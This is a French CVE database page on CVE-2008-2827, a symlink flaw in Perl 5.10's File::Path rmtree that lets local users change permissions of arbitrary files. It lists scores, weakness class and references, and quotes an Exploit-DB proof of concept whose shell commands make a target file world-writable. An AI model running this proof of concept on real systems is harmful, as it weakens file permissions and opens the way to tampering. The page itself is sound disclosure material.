CVE-2008-2827 : Détail

CVE-2008-2827

A01-Broken Access Control
0.04%V3
Local
2008-06-23
17h00 +00:00
2017-08-07
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The rmtree function in lib/File/Path.pm in Perl 5.10 does not properly check permissions before performing a chmod, which allows local users to modify the permissions of arbitrary files via a symlink attack, a different vulnerability than CVE-2005-0448 and CVE-2004-0452.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 31959

Date de publication : 2008-06-22 22h00 +00:00
Auteur : Frans Pop
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/29902/info Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links. Attackers can leverage this issue to change the permissions of arbitrary files. Perl 5.10.0 is vulnerable; other versions may also be affected. % touch foo % ln -s foo bar % ls -l foo bar lrwxrwxrwx 1 example example 3 2008-06-21 09:06 bar -> foo -rw-r--r-- 1 example example 0 2008-06-21 09:06 foo % perl -e 'use File::Path rmtree; rmtree bar' % ls -l foo bar ls: cannot access bar: No such file or directory -rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo

Products Mentioned

Configuraton 0

Perl>>Perl >> Version 5.10

Références

http://www.securityfocus.com/bid/29902
Tags : vdb-entry, x_refsource_BID
http://www.mandriva.com/security/advisories?name=MDVSA-2008:165
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/31687
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1020373
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/30790
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30837
Tags : third-party-advisory, x_refsource_SECUNIA